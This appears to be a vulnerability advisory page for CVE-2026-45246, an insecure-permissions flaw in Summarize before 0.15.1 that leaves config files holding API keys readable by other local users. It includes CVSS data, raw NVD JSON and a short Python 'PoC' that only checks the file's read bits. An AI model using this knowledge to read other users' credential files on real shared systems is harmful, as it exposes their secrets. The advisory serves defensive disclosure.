Security Vulnerability Report
CVE-2026-45246 CVSS 5.5 MEDIUM

CVE-2026-45246

Published: 2026-05-18 20:16:39
Last Modified: 2026-05-19 01:34:56

Description

Summarize prior to 0.15.1 contains an insecure file permission vulnerability in the refresh-free configuration rewrite path that allows local users to read sensitive credentials by exploiting default filesystem permissions. When the refresh-free path rewrites the configuration file, it creates the replacement with default process umask permissions instead of preserving the original file permissions, exposing the config file containing API keys and provider credentials to other local users on shared Unix-like systems.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:steipete:summarize:*:*:*:*:*:*:*:* - VULNERABLE
Summarize < 0.15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
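# PoC for CVE-2026-45246: Summarize Insecure File Permissions
# This script checks whether the config file is readable by group/others, which is
# what the umask-default rewrite described in the advisory (CWE-732) leaves behind.
import os
import stat

CONFIG_PATH = "/path/to/summarize/config.yml"  # Replace with actual path

# Permission bits that expose the file to users other than its owner.
_GROUP_OR_OTHER_READ = stat.S_IRGRP | stat.S_IROTH


def check_vulnerability(path: str = CONFIG_PATH) -> bool:
    """Report whether the config file at *path* is readable by group or others.

    Args:
        path: Config file to inspect; defaults to CONFIG_PATH.

    Returns:
        True when the group or other read bit is set (the exposure the advisory
        describes), False when the file is owner-only or cannot be inspected.
    """
    try:
        # Stat directly instead of exists()+stat(): the two-call form races with
        # the file being replaced between the calls, which is exactly what the
        # rewrite path does.
        file_stat = os.stat(path)
    except FileNotFoundError:
        print(f"[!] Config file not found at {path}")
        return False
    except OSError as e:
        # Narrow to OSError: anything else is a bug in this script, not a finding.
        print(f"[!] Error inspecting file: {e}")
        return False

    mode = stat.S_IMODE(file_stat.st_mode)
    print(f"[*] File permissions: {oct(mode)}")

    if mode & _GROUP_OR_OTHER_READ:
        # The mode bits alone establish the finding; the file contents are not
        # echoed, since that would copy API keys into terminal scrollback/logs.
        print("[+] Vulnerability confirmed! File is readable by unauthorized users.")
        return True

    print("[-] File permissions appear secure (not readable by group/others).")
    return False


if __name__ == "__main__":
    check_vulnerability()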

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45246", "sourceIdentifier": "[email protected]", "published": "2026-05-18T20:16:38.823", "lastModified": "2026-05-19T01:34:55.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Summarize prior to 0.15.1 contains an insecure file permission vulnerability in the refresh-free configuration rewrite path that allows local users to read sensitive credentials by exploiting default filesystem permissions. When the refresh-free path rewrites the configuration file, it creates the replacement with default process umask permissions instead of preserving the original file permissions, exposing the config file containing API keys and provider credentials to other local users on shared Unix-like systems."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:steipete:summarize:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.15.1", "matchCriteriaId": "FDA6FF18-A9BB-4892-B428-AB85BB58E16A"}]}]}], "references": [{"url": "https://github.com/steipete/summarize/commit/9e990193650a23dab73f37d5e1964d574a44098b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/steipete/summarize/pull/217", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/steipete/summarize/releases/tag/v0.15.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/summarize-insecure-file-permissions-information-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}